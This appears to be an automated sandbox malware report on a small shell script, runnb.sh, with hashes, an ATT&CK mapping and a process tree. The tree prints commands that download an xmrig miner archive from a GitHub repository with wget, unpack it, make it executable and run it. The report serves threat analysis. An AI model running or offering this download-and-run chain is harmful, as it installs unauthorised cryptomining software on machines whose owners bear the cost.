62d6004452cfd60bd2b6c5395081c77cc84e7fa63eefb203daa1652cda475b8c

Analysis

max time kernel
0s
max time network
1682s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
16-10-2024 23:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

runnb.sh
Size

160B
MD5

87ea8773efcca67a4f2ce3e1ba1d1ff8
SHA1

0770e97785f007f7a3bc9d7e35a72b16895c366d
SHA256

765a3183613b556d32d8775fc21410c61d1565a372c27ed54193d4808b5cdb01
SHA512

df69c7a84df081850f4a1f72d78f65ddf61074fd4af7f989458cdc4273b5a64eeccb6864391ca780875e7b754834bbcbb17d550c4c9514101a8d3f45470ac514

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmod

pid	Process
1492	chmod

Reads runtime system information 1 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

tar

description	ioc	Process
File opened for reading	/proc/filesystems	tar

/tmp/runnb.sh
/tmp/runnb.sh
1⤵
PID:1483
- /usr/bin/wget
  wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz
  2⤵
  PID:1484
- /bin/tar
  tar xvf xmrigtar.tar.gz
  2⤵
  - Reads runtime system information
  PID:1491
- /bin/chmod
  chmod +x xmrig
  2⤵
  - File and Directory Permissions Modification
  PID:1492
- /tmp/xmrig
  ./xmrig
  2⤵
  PID:1493

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads